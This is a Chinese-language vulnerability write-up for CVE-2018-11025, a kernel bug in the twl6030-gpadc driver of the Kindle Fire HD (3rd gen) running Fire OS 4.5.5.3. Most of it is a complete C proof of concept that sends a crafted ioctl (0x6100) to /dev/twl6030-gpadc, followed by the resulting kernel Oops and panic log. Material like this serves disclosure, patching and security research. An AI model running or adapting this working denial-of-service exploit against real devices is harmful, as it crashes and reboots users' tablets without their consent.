(CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.md
## 一、漏洞简介
Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 内核组件中的驱动模块 /omap/drivers/mfd/twl6030-gpadc.c 存在缺陷:攻击者对设备文件 /dev/twl6030-gpadc 调用 ioctl(命令号 **24832**,即 0x6100)并传入精心构造的参数,即可使内核崩溃。从下方崩溃日志看,twl6030_gpadc_ioctl 在处理该命令时访问了无效的内核地址(疑似未校验用户传入的参数),引发内核 Oops 并最终 panic 重启,属于本地拒绝服务。
要触发此漏洞,需要能够打开设备文件 /dev/twl6030-gpadc(运行 PoC 的进程必须对该设备节点拥有打开及 ioctl 的权限),然后以命令 **24832** 作为第二个参数、指向精心构造的结构体的指针作为第三个参数调用 ioctl 系统调用。
## 二、漏洞影响
Fire OS 4.5.5.3(Kindle Fire HD 第三代,崩溃日志中的内核版本为 3.4.83)
## 三、复现过程
### poc
```
/*
* PoC for CVE-2018-11025 on the Kindle Fire HD (3rd gen), Fire OS 4.5.5.3.
* A bug in the ioctl handler of the device file /dev/twl6030-gpadc lets
* ioctl request 24832 (0x6100) with a crafted argument crash the kernel
* (Oops, followed by panic and reboot).
*
* The process running this PoC must be permitted to open and ioctl
* /dev/twl6030-gpadc.
*
*/
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>
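/* Device node whose ioctl handler is targeted. */
static const char *driver = "/dev/twl6030-gpadc";

/*
 * ioctl request number that reaches the crashing path (24832 == 0x6100).
 * Given an explicit type: the original `static command = ...` relied on
 * implicit int, which C99 and later no longer allow.
 */
static const int command = 24832;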
/*
 * Argument handed to the kernel by pointer as the ioctl's third parameter.
 * The layout presumably mirrors the driver's own struct
 * twl6030_gpadc_user_parms in /omap/drivers/mfd/twl6030-gpadc.c — verify
 * against the kernel source before changing field types or order.
 */
struct twl6030_gpadc_user_parms {
int channel;           /* the crafted field; main() sets it to 0x9b2a9212 */
int status;            /* left at 0 by main() */
unsigned short result; /* left at 0 by main() */
};
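/*
 * Record which stage failed in /data/local/tmp/log (truncating the file),
 * so the failure point can be read back after the device reboots.
 * Same effect as the original `echo N > /data/local/tmp/log`, but without
 * spawning a shell through system().
 */
static void note_progress(int stage) {
    FILE *log = fopen("/data/local/tmp/log", "w");
    if (log == NULL) {
        return; /* best effort: the marker is a convenience, not a requirement */
    }
    fprintf(log, "%d\n", stage);
    fclose(log);
}

/*
 * Entry point of the PoC.
 *
 * Opens the gpadc device node and issues ioctl `command` (24832) with a
 * crafted twl6030_gpadc_user_parms argument. On a vulnerable kernel the
 * call does not return: the kernel oopses and panics.
 *
 * Returns 0 if the ioctl unexpectedly returns, -1 if the device cannot be
 * opened or the ioctl is rejected. The caller needs permission to open the
 * device node.
 */
int main(int argc, char **argv, char **env) {
    (void)argc;
    (void)argv;
    (void)env;

    /* Only channel carries the crafted value; zero everything else
     * (including padding) so nothing uninitialised reaches the kernel. */
    struct twl6030_gpadc_user_parms payload = { 0 };
    payload.channel = (int)0x9b2a9212; /* raw bits are what the driver sees */
    payload.status = 0;
    payload.result = 0;

    int fd = open(driver, O_RDWR);
    if (fd < 0) {
        int err = errno; /* capture before printf can clobber it */
        printf("Failed to open %s, with errno %d\n", driver, err);
        note_progress(1);
        return -1;
    }

    /* The original message claimed a NULL payload; &payload is passed. */
    printf("Try ioctl device file '%s', with command 0x%x and channel 0x%x\n",
           driver, (unsigned)command, (unsigned)payload.channel);
    printf("System will crash and reboot.\n");

    if (ioctl(fd, command, &payload) < 0) {
        int err = errno;
        printf("ioctl failed, errno %d\n", err);
        note_progress(2);
        close(fd);
        return -1;
    }

    close(fd);
    return 0;
}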
```
### 崩溃日志
```
[18460.321624] Unable to handle kernel paging request at virtual address 4b3f25fc
[18460.330139] pgd = ca210000
[18460.333251] [4b3f25fc] *pgd=00000000
[18460.337768] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[18460.343810] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[18460.351440] CPU: 0 Tainted: G O (3.4.83-gd2afc0bae69 #1)
[18460.358825] PC is at twl6030_gpadc_ioctl+0x160/0x180
[18460.364379] LR is at twl6030_gpadc_conversion+0x5c/0x484
[18460.370452] pc : [<c031b080>] lr : [<c031a950>] psr: 60030013
[18460.370452] sp : de94dd90 ip : 00000000 fp : de94df04
[18460.383422] r10: 00000000 r9 : dcccf608 r8 : bea875ec
[18460.389282] r7 : de94c000 r6 : 00000000 r5 : 00006100 r4 : bea875ec
[18460.396697] r3 : fffffeb4 r2 : 4b3f2730 r1 : de94dee8 r0 : 00000001
[18460.404113] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[18460.412048] Control: 10c5387d Table: 8a21004a DAC: 00000015
[18460.418609]
[18460.418609] PC: 0xc031b000:
[18460.423583] b000 e24b101c e30f3eb4 e34f3fff e0822082 e0812102 e51220e4 e18120b3 e5973008
[18460.434234] b020 e294200c 30d22003 33a03000 e3530000 0a000006 e3e0000c e24bd01c e89da8f0
[18460.444885] b040 e24b0e17 e3a0100c ebfcf5c4 eafffff8 e1a00004 e24b1e17 e3a0200c ebfced7f
[18460.455444] b060 e3500000 0afffff3 eafffff1 e51b2170 e24b101c e30f3eb4 e34f3fff e0812102
[18460.465972] b080 e5122134 e18120b3 eaffffe3 03e0303c 150b016c 050b316c eaffffdf c0acabbc
[18460.476623] b0a0 e1a0c00d e92dd800 e24cb004 e59030e0 e3530000 159000ec 03e00012 e89da800
[18460.487182] b0c0 e1a0c00d e92dd800 e24cb004 e59000f0 e89da800 e1a0c00d e92dd800 e24cb004
[18460.497863] b0e0 e5d020e9 e5d030e8 e1820003 e2000003 e89da800 e1a0c00d e92dd800 e24cb004
[18460.508544]
[18460.508544] LR: 0xc031a8d0:
[18460.513519] a8d0 e89da878 e1a00004 ebffff20 e2000003 e3500002 13e0000a 03a00000 e89da878
[18460.524078] a8f0 c09ba0c0 e1a0c00d e92ddff0 e24cb004 e24dd014 e2509000 0a000114 e59f5454
[18460.534759] a910 e595008c e3500000 0a00010b e2800004 eb0e1ff0 e1d910b6 e3510001 9a00000a
[18460.545318] a930 e595308c e3e06015 e59f142c e5930000 ebff4e6b e595a08c e28a0004 eb0e1f69
[18460.555999] a950 e1a00006 e24bd028 e89daff0 e595a08c e3a03f52 e023a193 e5933038 e3530000
[18460.566680] a970 13e0600f 1afffff3 e59a32c4 e0818101 e595c088 e3130010 e08c7008 1a000025
[18460.577331] a990 e3510000 0a0000c4 e1d930b8 e3530001 0a0000d7 e1d940b6 e3540000 0a0000bc
[18460.587890] a9b0 e3a0000e e3a01002 e3a02090 e5956088 ebfff8bc e3540001 0a0000d1 e1d920b6
[18460.598571]
[18460.598571] SP: 0xde94dd10:
[18460.603546] dd10 00000000 0000000d de94dda0 10624dd3 de94dd4c c031b080 60030013 ffffffff
[18460.614196] dd30 de94dd7c bea875ec de94df04 de94dd48 c06a5318 c0008370 00000001 de94dee8
[18460.624877] dd50 4b3f2730 fffffeb4 bea875ec 00006100 00000000 de94c000 bea875ec dcccf608
[18460.635528] dd70 00000000 de94df04 00000000 de94dd90 c031a950 c031b080 60030013 ffffffff
[18460.646087] dd90 de94ddac 9b2a9212 00000000 00000000 00040000 0001f8fc 00000000 00000000
[18460.656738] ddb0 c00795a0 00000001 de94ddd4 de94ddc8 c00795b4 c00792bc de94de0c de94ddd8
[18460.667419] ddd0 c0070df8 c00795ac de94c000 00000001 00000004 dd32f8f4 60000013 00000001
[18460.678100] ddf0 00000001 00000004 dd32f800 00000000 00000000 de94de10 c00723a0 c06a4818
[18460.688629]
[18460.688659] FP: 0xde94de84:
[18460.693725] de84 de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0
[18460.704284] dea4 000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000
[18460.714935] dec4 00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000
[18460.725616] dee4 00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044
[18460.736328] df04 c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8
[18460.746856] df24 de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000
[18460.757537] df44 00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000
[18460.768096] df64 00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000 00000400
[18460.778625]
[18460.778625] R1: 0xde94de68:
[18460.783721] de68 c2572140 de94debc 00000001 00000028 000fffff 00000001 de94dedc de94de90
[18460.794403] de88 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0 000fffff
[18460.804962] dea8 00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000 00000001
[18460.815643] dec8 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000 00000000
[18460.826202] dee8 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044 c031af2c
[18460.836730] df08 00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8 de94df0c
[18460.847381] df28 de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000 00000000
[18460.858032] df48 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000 00000000
[18460.868713]
[18460.868713] R3: 0xfffffe34:
[18460.873687] fe34 ******** ******** ******** ******** ******** ******** ******** ********
[18460.884246] fe54 ******** ******** ******** ******** ******** ******** ******** ********
[18460.894805] fe74 ******** ******** ******** ******** ******** ******** ******** ********
[18460.905456] fe94 ******** ******** ******** ******** ******** ******** ******** ********
[18460.916137] feb4 ******** ******** ******** ******** ******** ******** ******** ********
[18460.926788] fed4 ******** ******** ******** ******** ******** ******** ******** ********
[18460.937347] fef4 ******** ******** ******** ******** ******** ******** ******** ********
[18460.948028] ff14 ******** ******** ******** ******** ******** ******** ******** ********
[18460.958709]
[18460.958709] R7: 0xde94bf80:
[18460.963684] bf80 de926680 c00635cc 00000013 de84190c de926680 c00635cc 00000013 00000000
[18460.974365] bfa0 00000000 00000000 de94bff4 de94bfb8 c0068af4 c00635d8 00000000 00000000
[18460.985015] bfc0 de926680 00000000 00000000 00000000 de94bfd0 de94bfd0 00000000 de84190c
[18460.995574] bfe0 c0068a64 c004cd64 00000000 de94bff8 c004cd64 c0068a70 1d04e2fb 1dfbe204
[18461.006225] c000 00000000 00000002 00000000 c2572140 c0a0e840 00000000 00000015 cf9fca80
[18461.016906] c020 00000000 de94c000 c09ddc50 c2572140 c25717c0 c1617b40 de94da7c de94d9c8
[18461.027587] c040 c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
[18461.038146] c060 00c5f4c0 5ebcc27f 00000000 00000000 00000000 00000000 00000000 00000000
[18461.048828]
[18461.048828] R9: 0xdcccf588:
[18461.053802] f588 dcccf588 dcccf588 00000000 00000000 00000000 c06bc674 000200da c09dda58
[18461.064483] f5a8 00000000 00000000 dcccf5b0 dcccf5b0 00000000 dcccf5bc dcccf5bc 00000000
[18461.075134] f5c8 5ae3ed25 00000000 00000000 00000000 dcccf5e0 00000000 00000000 00000000
[18461.085815] f5e8 00200000 00000000 00000000 dcccf5f4 dcccf5f4 dccb2440 dccb2440 00000000
[18461.096343] f608 00052180 00000000 00000000 00000000 00000000 00000000 c06b9600 dd1a4800
[18461.107025] f628 dcccf6e0 dccb0300 00000c45 00000001 00a0003b 5ae3ed25 2bc5ac58 5ae3ed25
[18461.117675] f648 2bc5ac58 5ae3ed25 2bc5ac58 00000000 00000000 00000000 00000000 00000000
[18461.128234] f668 00000000 00000000 00000000 00000000 00000001 00000000 00000000 dcccf684
[18461.138885] Process twl6030_gpadc_i (pid: 12849, stack limit = 0xde94c2f8)
[18461.146697] Stack: (0xde94dd90 to 0xde94e000)
[18461.151611] dd80: de94ddac 9b2a9212 00000000 00000000
[18461.160827] dda0: 00040000 0001f8fc 00000000 00000000 c00795a0 00000001 de94ddd4 de94ddc8
[18461.170043] ddc0: c00795b4 c00792bc de94de0c de94ddd8 c0070df8 c00795ac de94c000 00000001
[18461.179138] dde0: 00000004 dd32f8f4 60000013 00000001 00000001 00000004 dd32f800 00000000
[18461.188354] de00: 00000000 de94de10 c00723a0 c06a4818 00000004 00000001 dd32e0d8 dd32f800
[18461.197570] de20: dd32e000 0000000a de94c000 c26fda80 de94de54 de94de40 c02ba53c c0072360
[18461.206787] de40: dd32f800 dd32e000 de94de74 de94de58 c02c3c88 c02ba518 dd32e000 00000002
[18461.215881] de60: 00000002 dd32fbbc c2572140 de94debc 00000001 00000028 000fffff 00000001
[18461.225097] de80: de94dedc de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8
[18461.234313] dea0: c00723a0 000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14
[18461.243408] dec0: 00000000 00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000
[18461.252624] dee0: 00000000 00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08
[18461.261840] df00: c0136044 c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490
[18461.271057] df20: d8f925d8 de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004
[18461.280151] df40: de94c000 00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004
[18461.289367] df60: de94c000 00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000
[18461.298583] df80: 00000400 bea87618 00010e5c 00000000 00000036 c0013e08 00000000 de94dfa8
[18461.307800] dfa0: c0013c60 c0136578 bea87618 00010e5c 00000004 00006100 bea875ec bea875ec
[18461.316894] dfc0: bea87618 00010e5c 00000000 00000036 00000000 00000000 00000000 bea87604
[18461.326110] dfe0: 00000000 bea875d4 00010698 0002918c 60000010 00000004 00000000 00000000
[18461.335296] Backtrace:
[18461.338317] [<c031af20>] (twl6030_gpadc_ioctl+0x0/0x180) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[18461.348571] r7:d683fb40 r6:00000004 r5:d683fb40 r4:00000000
[18461.355560] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[18461.364807] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[18461.374206] r8:c0013e08 r7:00000036 r6:00000000 r5:00010e5c r4:bea87618
[18461.382507] Code: e24b101c e30f3eb4 e34f3fff e0812102 (e5122134)
[18461.401061] Board Information:
[18461.401061] Revision : 0001
[18461.401092] Serial : 0000000000000000
[18461.401092] SoC Information:
[18461.401092] CPU : OMAP4470
[18461.401122] Rev : ES1.0
[18461.401122] Type : HS
[18461.401122] Production ID: 0002B975-000000CC
[18461.401122] Die ID : 1CC60000-50002FFF-0B00935D-11007004
[18461.401153]
[18461.406127] audit_printk_skb: 111 callbacks suppressed
[18461.406127] type=1400 audit(1525657115.783:1097): avc: denied { getattr } for pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406280] type=1400 audit(1525657115.783:1098): avc: denied { execute } for pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406524] type=1400 audit(1525657115.783:1099): avc: denied { read open } for pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406768] type=1400 audit(1525657115.783:1100): avc: denied { execute_no_trans } for pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.534057] ---[ end trace f98f4a7b98572f61 ]---
[18461.540374] Kernel panic - not syncing: Fatal exception
[18461.546173] CPU1: stopping
[18461.549285] Backtrace:
[18461.552459] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[18461.561828] r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950
[18461.568969] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[18461.578185] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[18461.587554] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5540>] (__irq_usr+0x40/0x60)
[18461.596862] Exception stack(0xc8967fb0 to 0xc8967ff8)
[18461.602691] 7fa0: 404143ed 4041294b 00000054 000012f0
[18461.611755] 7fc0: 4028cdb4 4040e438 0000012f 4041294b 4040d148 404111d8 beb9c2e0 404275c0
[18461.620971] 7fe0: 40416bef beb9c1f0 4009d01f 400a0ec0 000f0010 ffffffff
[18461.628478] r6:ffffffff r5:000f0010 r4:400a0ec0 r3:404143ed
[18461.635559] CPU0 PC (0) : 0xc003ee38
[18461.639617] CPU0 PC (1) : 0xc003ee54
[18461.643798] CPU0 PC (2) : 0xc003ee54
[18461.647857] CPU0 PC (3) : 0xc003ee54
[18461.651916] CPU0 PC (4) : 0xc003ee54
[18461.656097] CPU0 PC (5) : 0xc003ee54
[18461.660156] CPU0 PC (6) : 0xc003ee54
[18461.664215] CPU0 PC (7) : 0xc003ee54
[18461.668395] CPU0 PC (8) : 0xc003ee54
[18461.672454] CPU0 PC (9) : 0xc003ee54
[18461.676513] CPU1 PC (0) : 0xc0019b2c
[18461.680694] CPU1 PC (1) : 0xc0019b2c
[18461.684753] CPU1 PC (2) : 0xc0019b2c
[18461.688812] CPU1 PC (3) : 0xc0019b2c
[18461.692871] CPU1 PC (4) : 0xc0019b2c
[18461.697051] CPU1 PC (5) : 0xc0019b2c
[18461.701110] CPU1 PC (6) : 0xc0019b2c
[18461.705169] CPU1 PC (7) : 0xc0019b2c
[18461.709381] CPU1 PC (8) : 0xc0019b2c
[18461.713409] CPU1 PC (9) : 0xc0019b2c
[18461.717498]
[18461.719268] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[18461.719299]
```